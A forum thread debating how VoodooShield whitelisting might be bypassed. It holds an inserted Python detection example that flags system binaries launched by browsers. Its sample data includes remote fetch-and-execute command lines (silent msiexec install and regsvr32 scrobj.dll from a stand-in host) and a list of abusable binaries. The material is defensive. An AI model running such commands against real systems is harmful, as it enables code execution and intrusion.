How would one get past VoodooShield?

SHvFl

First, the easiest method is the user allowing something bad. Then there is running Smart or AutoPilot mode and it failing to detect a virus, VS being exploited, and finally a method that VS doesn't protect against.
 

LukeNukesEm

Thread author
> Luke, we're a security-themed site; this is a question for a very different type of site, please don't pursue this here. I could be wrong though; if I am, a mod can delete this reply.

I was asking this to use whatever methods I can learn from how they would get past VoodooShield. For example, I now know to be more aware of what apps I allow with VoodooShield.

> First, the easiest method is the user allowing something bad. Then there is running Smart or AutoPilot mode and it failing to detect a virus, VS being exploited, and finally a method that VS doesn't protect against.

So if I were very aware of what I allow, VoodooShield practically makes me near bullet-proof?
 

_CyberGhosT_

> I was asking this to use whatever methods I can learn from how they would get past VoodooShield.

Still poorly worded, but VS is very secure; it is you who would be more likely to let something through than for VS to fail you, like Huracan points out.
Still, even if a user here knew how to bypass VS, I assure you it would not be posted here.
 

ExoGen CyberSecurity

I would use a safe file to trick the user into installing the malware; once you allow something there is no other way of checking the file. So there you go. If you use it with Bitdefender Free or another product that has IDS/BB, it's a little harder.

In conclusion, I exploit the user and the confusing alerts :)
 

_CyberGhosT_

> I would use a safe file to trick the user into installing the malware; once you allow something there is no other way of checking the file. So there you go. If you use it with Bitdefender Free or another product that has IDS/BB, it's a little harder.
>
> In conclusion, I exploit the user and the confusing alerts :)

Not even close, Voodoo AI would most likely catch the payload; have you ever used VS before?
 

ExoGen CyberSecurity

> Not even close, Voodoo AI would most likely catch the payload; have you ever used VS before?

Yes and yes. Like I said before, you exploit the confusing alerts :) It's like any other security product (you don't even know what you install or what you allow).

Once you allow something, that is a bypass.
 

_CyberGhosT_

> Yes and yes. Like I said before, you exploit the confusing alerts :) It's like any other security product.
>
> Once you allow something, that is a bypass.

The file approach would be more likely than not to fail, and you should know that if you're familiar with VS.
Now we're back to "user error" ;)
 

ExoGen CyberSecurity

I don't know why you keep saying that I don't know how it works or that I'm not familiar with VoodooShield. Just because I said my point of view and you don't agree doesn't mean that I don't understand how it works or that I'm wrong :)

I'm using Comodo with the best settings you can have and you can still bypass it :)

The OP wanted to know some points of view and we gave him some; it's not about how good this product is and how nothing can bypass it.
 

_CyberGhosT_

> I don't know why you keep saying that I don't know how it works or that I'm not familiar with VoodooShield. Just because I said my point of view and you don't agree doesn't mean that I don't understand how it works or that I'm wrong :)
>
> I'm using Comodo with the best settings you can have and you can still bypass it :)
>
> The OP wanted to know some points of view and we gave him some; it's not about how good this product is and how nothing can bypass it.

I will comment no further, but what I clearly stated is that "if you're truly familiar" with VS then you should be aware that hiding a payload within a safe or whitelisted file, process, or folder will most likely fail due to VoodooShield's AI. Suggesting it's a viable approach to bypassing VS in and of itself speaks volumes as to your experience with VS, period; I infer nothing else.
No software is 100%, that's common knowledge. ;)
 

ExoGen CyberSecurity

> I will comment no further, but what I clearly stated is that "if you're truly familiar" with VS then you should be aware that hiding a payload within a safe or whitelisted file, process, or folder will most likely fail due to VoodooShield's AI. Suggesting it's a viable approach to bypassing VS in and of itself speaks volumes as to your experience with VS, period; I infer nothing else.
> No software is 100%, that's common knowledge. ;)

This is the same with any security product; the human factor is the most important because he/she must know what to allow or what to block. It's the same with firewalls, and the list goes on. That's why you should always have a second-opinion scanner if you use some type of default deny, HIPS and so on.

Also, that's why I never recommend a security product to anyone.
 

askmark

> Browser exploit that abuses whitelisted Windows processes, e.g. .NET Framework, msiexec, etc., and/or use memory exploits.

My understanding from what Dan has said on the other forum is that web apps are protected and cannot run vulnerable system processes. Would that mitigate the risk of the type of exploit you are referring to?
 
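The protection askmark describes (a browser is treated as a web app, so whatever it tries to launch is untrusted even when the child is a signed, whitelisted Windows binary such as msiexec.exe or a .NET utility) comes down to a parent/child process rule. The block below is an added example, not VoodooShield's code and not anything posted in this thread: it runs that rule as detection logic over a handful of constructed, Sysmon-style process-creation records. The field names (ProcessId, ParentProcessId, Image, ParentImage, CommandLine), the process IDs, the command lines and the list of abusable binaries are all assumptions made for the example. It also goes one step beyond the direct parent check by walking the ancestry, so a browser that launches cmd.exe which then launches regsvr32.exe is still caught.

```python
"""Parent/child process rule: flag whitelisted Windows binaries launched by a browser.

Added example (not VoodooShield's code). The events below are constructed to
resemble Sysmon Event ID 1 records; field names, PIDs and command lines are
assumptions made for illustration only.
"""
from __future__ import annotations

import ntpath

# Browsers are treated as "web apps": anything they spawn is untrusted input.
BROWSER_PARENTS = {
    "chrome.exe", "firefox.exe", "iexplore.exe", "microsoftedge.exe", "msedge.exe",
}

# Signed, normally whitelisted Windows binaries commonly abused as launchers.
# Illustrative, not exhaustive.
ABUSABLE_SYSTEM_BINARIES = {
    "msiexec.exe", "regsvr32.exe", "rundll32.exe", "mshta.exe", "wscript.exe",
    "cscript.exe", "powershell.exe", "installutil.exe", "msbuild.exe",
    "regasm.exe", "regsvcs.exe",
}

# Constructed sample telemetry (hypothetical paths, PIDs and command lines).
SAMPLE_EVENTS = [
    {"ProcessId": 4200, "ParentProcessId": 4100,
     "Image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "chrome.exe"},
    {"ProcessId": 4300, "ParentProcessId": 4200,
     "Image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "ParentImage": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "CommandLine": "chrome.exe --type=renderer"},
    {"ProcessId": 4400, "ParentProcessId": 4200,            # browser -> msiexec
     "Image": r"C:\Windows\System32\msiexec.exe",
     "ParentImage": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "CommandLine": "msiexec.exe /q /i http://example.invalid/setup.msi"},
    {"ProcessId": 4500, "ParentProcessId": 4200,            # browser -> cmd
     "Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "CommandLine": "cmd.exe /c start regsvr32"},
    {"ProcessId": 4600, "ParentProcessId": 4500,            # cmd -> regsvr32
     "Image": r"C:\Windows\System32\regsvr32.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "regsvr32.exe /s /n /u /i:http://example.invalid/p.sct scrobj.dll"},
    {"ProcessId": 4700, "ParentProcessId": 900,             # installer service, benign
     "Image": r"C:\Windows\System32\msiexec.exe",
     "ParentImage": r"C:\Windows\System32\services.exe",
     "CommandLine": "msiexec.exe /V"},
    {"ProcessId": 4800, "ParentProcessId": 4100,            # user-launched, benign
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell.exe"},
]


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path (works on any host OS)."""
    return ntpath.basename(path).lower()


def ancestor_images(event: dict, by_pid: dict, max_depth: int) -> list[str]:
    """Image names from the direct parent upward, at most max_depth entries.

    The direct parent comes from ParentImage, so it is known even when the
    parent's own creation event was never logged; further ancestors are
    resolved through the PID index while records exist.
    """
    chain = [basename(event["ParentImage"])]
    parent = by_pid.get(event["ParentProcessId"])
    while parent is not None and len(chain) < max_depth:
        chain.append(basename(parent["ParentImage"]))
        parent = by_pid.get(parent["ParentProcessId"])
    return chain


def browser_launched_lolbins(events: list[dict], max_depth: int = 3) -> list[dict]:
    """Return one finding per abusable system binary that has a browser ancestor.

    Depth 1 is the direct-parent case; larger depths catch an intermediate
    launcher (browser -> cmd.exe -> regsvr32.exe).
    """
    by_pid = {e["ProcessId"]: e for e in events}
    findings = []
    for e in events:
        image = basename(e["Image"])
        if image not in ABUSABLE_SYSTEM_BINARIES:
            continue
        chain = ancestor_images(e, by_pid, max_depth)
        for depth, ancestor in enumerate(chain, start=1):
            if ancestor in BROWSER_PARENTS:
                findings.append({"ProcessId": e["ProcessId"], "Image": image,
                                 "Depth": depth, "Chain": chain[:depth],
                                 "CommandLine": e["CommandLine"]})
                break
    return findings


if __name__ == "__main__":
    for f in browser_launched_lolbins(SAMPLE_EVENTS):
        print(f"pid {f['ProcessId']} {f['Image']} via {' <- '.join(f['Chain'])}: {f['CommandLine']}")
```

Two of the seven constructed records trigger: msiexec.exe launched directly by chrome.exe, and regsvr32.exe launched by a cmd.exe whose parent is chrome.exe. The msiexec.exe started by services.exe and the PowerShell started from Explorer are left alone, which is the point of keying on the launcher rather than on the binary's reputation.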

ExoGen CyberSecurity

VoodooShield can't be bypassed by browser attacks. From what I tested, you can bypass VoodooShield if you do it yourself (I tested in AutoPilot); what I'm saying is, if you click on the alert and allow it. There is a high chance that you can bypass it with sponsored-type attacks or some type of government attack (targeted at VoodooShield).
 

_CyberGhosT_

> My understanding from what Dan has said on the other forum is that web apps are protected and cannot run vulnerable system processes. Would that mitigate the risk of the type of exploit you are referring to?

Very astute, Mark, and correct. The way he suggested to foil VS was misinformation, and as a self-proclaimed "advanced user" this surprised me, is all. Oh well, I'm past it now.
Great post, Mark :)
 

askmark

> Very astute, Mark, and correct. The way he suggested to foil VS was misinformation, and as a self-proclaimed "advanced user" this surprised me, is all. Oh well, I'm past it now.
> Great post, Mark :)

Thank you. Well, we can't have people who might read this thread think VS isn't a credible security layer to have on your PC. That would be an injustice.
 

ZeroDay

> I would use a safe file to trick the user into installing the malware; once you allow something there is no other way of checking the file. So there you go. If you use it with Bitdefender Free or another product that has IDS/BB, it's a little harder.
>
> In conclusion, I exploit the user and the confusing alerts :)

Can you provide a video demonstration? I'd be interested, and it would help the devs too.
 
